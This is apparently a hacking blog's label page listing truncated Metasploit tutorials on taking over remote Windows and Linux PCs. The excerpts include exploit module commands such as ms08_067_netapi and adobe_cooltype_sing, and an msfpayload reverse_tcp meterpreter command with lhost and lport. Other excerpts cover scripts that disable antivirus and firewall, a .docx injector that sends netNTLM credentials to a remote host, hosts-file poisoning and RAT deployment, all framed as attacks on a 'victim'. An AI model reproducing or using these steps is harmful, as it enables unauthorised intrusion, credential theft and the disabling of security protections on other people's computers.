Showing posts with label remote computer hacking. Show all posts
Showing posts with label remote computer hacking. Show all posts
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Exploit HP sytem managment

 There are two modules available for exploitation of hp system management.(1)HP System Management Anonymous Access Code ExecutionThis module exploits an anonymous remote code execution on HP System Management 7.1.1 and earlier. The vulnerability exists when handling the iprange parameter on a request against /proxy/DataValidation....
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Microsoft Word UNC Path Injector

This module modifies a .docx file that will, upon opening, submit stored netNTLM credentials to a remote host. It can also create an empty docx file. If emailed the receiver needs to put the document in editing mode before the remote server will be contacted. Preview and read-only mode do not work. Verified to work with...
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Hack Remote P.C. using latest java vulnerability

P { margin-bottom: 0.08in; }A:link { } JAVA APPLET JMX REMOTE CODE EXECUTION:-This vulnerability is exploited in February 2013.Additionally, this module bypasses default security settings introduced in Java 7 Update 10 to run unsigned applet without displaying any warning to the user.Any O.S. Which is running...
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Metasploit Post Exploitation Methods

(A)Hide File in victim `s P.C:-After successfully got meterpreter sessions you can hide any file in victim `s P.C. Type following attribute.attrib +h +r +s drivename:/FoldernameFor example you want to hide folder name “songs” in F drive then just type following command in your terminal.shellattrib +h +r +s F:/songsFor...
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DOS attack on windows-7 using metasploit

!-- @page { margin: 0.79in } P { margin-bottom: 0.08in } This module exploits a denial of service flaw in the Microsoft Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger this bug, run this module as a service and forces a vulnerable client to access the IP of this system as an SMB  server....
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D.N.S. poisoning using metasploit.

Today we will edit hot file of the Remote P.C which has been compromised. By editing Host file you can Redirect any website to any I.P address. Absolutely we will use metasploit.(1)Hack remote p.c .(How to hack Remote P.C.?)(2)Now we will Bypass U.A.C. protection of windows.(3)Open Terminal & type following code in...
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How to use R.A.T. through S.E.T?

RAT is Remote Administration tool , using RAT you can control Remote P.C. ,there are lots of software available for RAT , but they are made from hackers, there is possibility of back-door in that readily available software. So today we use RAT through Social engineering toolkit(SET).(1)Open your terminal & typecd /opt/set./set(2)update...
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How to use latest java vulnerability to hack remote p.c. ?

Today we are going to use metasploit again. We can hack remote computer using java applet to run code outside send-box. This vulnerability is new. It` s applicable to java version 7 and earlier.(1)To use this vulnerability first update your metasploit modules by runnig command msfupdate in your terminal(2)Now after update...
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Some of the Cool Metasploit Metrepreter script

GetcountermeasureGetcountermeasure is an automated script Disable security measures such as antivirus, firewall, and more.Command:- run getcountermeasureGetguigetgui script is used to enable RDP on a target system.Command:- run getgui -eGetTelnetgettelnet script is used to enable telnet on the victim.Command:-...
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What you can do after hacking remote pc?

What you can do after hacking remote pc?If you know command line interface very well than you can operate remote pc as local pc.Here I am listing some basic code of metasploit to operate remote pc from your terminalBut before that you have to exploit remote pc . For this purpose check my previous posts of “How to hack...
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Hack Linux OS using METASPLOIT

The most common use of msfpayload tool is for the generation of shellcode for an exploit that is not currently in the Metasploit Framework or for testing different types of shellcode and options before finalizing a module.msfpayload linux/x86/meterpreter/reverse_tcp lhost= lport=4444 x > /root/Desktop/facebookNow...
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How to Find Email-Address of the domain using metasploit?

First open your terminal & Type following commandmsfconsoleuse auxiliary/gather/search_email_collector show options The next step you need to set up the domain you want to locate the email address.When we finished setup the domain, the default searching engine that will be use for this searching are Google, Bing,...
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Some Metasploit Attacks

today i will show you Some metasploit attacks.Requirement:-Backtrack.Metasploit.These are just some commands ,there are lots of options in metasploit. Acoording to vulnarability you can use it.Attack 1: Hacking Windows XP with Metasploit tutorial - VNC remote controluse windows/smb/ms08_067_netapishow optiosset RHOST...
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How to Hack Windows 7 using Metaspolit

The Metasploit Project is an open-source, computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the Metasploit Framework, a tool for developing and executing exploit code against a remote target...
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Hack windows 7 PC using MS11_003 Internet Explorer Exploit

This module exploits a memory corruption vulnerability within Microsoft’s HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused. This leads to arbitrary code execution. This exploit utilizes a combination of heap spraying and the .NET 2.0 ‘mscorie.dll’...
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Hack Remote XP using Heap Overflow Attack

This module exploits heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using the Windows Media Player ActiveX control. Exploitation is done by supplying a specially crafted MIDI file with...
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Hack Windows XP using Shell Link Code Execution

This module exploits vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.Exploit TargetsWindows XP service pack 2Windows XP service pack 3RequirementAttacker:metasploitVictim...
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Hack Remote PC with Operation Aurora Attack

Operation Aurora was a cyber attack which began in mid-2009 and continued through December 2009. The attack was first publicly disclosed by Google on January 12, 2010, in a blog post. In the blog post, Google said the attack originated in China. The attacks were both sophisticated and well resourced and consistent with...
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Hack any Remote PC with Adobe JBIG2Decode Heap Corruption Exploit

This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. This module relies upon JavaScript for the heap spray.Exploit Targets0 – Adobe Reader v9.0.0 (Windows XP SP3 English) (default)1 – Adobe Reader v8.1.2 (Windows XP SP2 English)RequirementAttacker:metasploitVictim PC: Windows XPOpen...
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Hack remote PC using Adobe CoolType SING Table “uniqueName” Stack Buffer Overflow

This module exploits vulnerability in the Smart Independent Glyplets (SING) table handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior version is assumed to be vulnerable as well.Exploit Targets0 – Automatic (default)RequirementVictim PC: Windows XPOpen backtrack terminal typemsfconsoleuse exploit/windows/browser/adobe_cooltype_singMsf...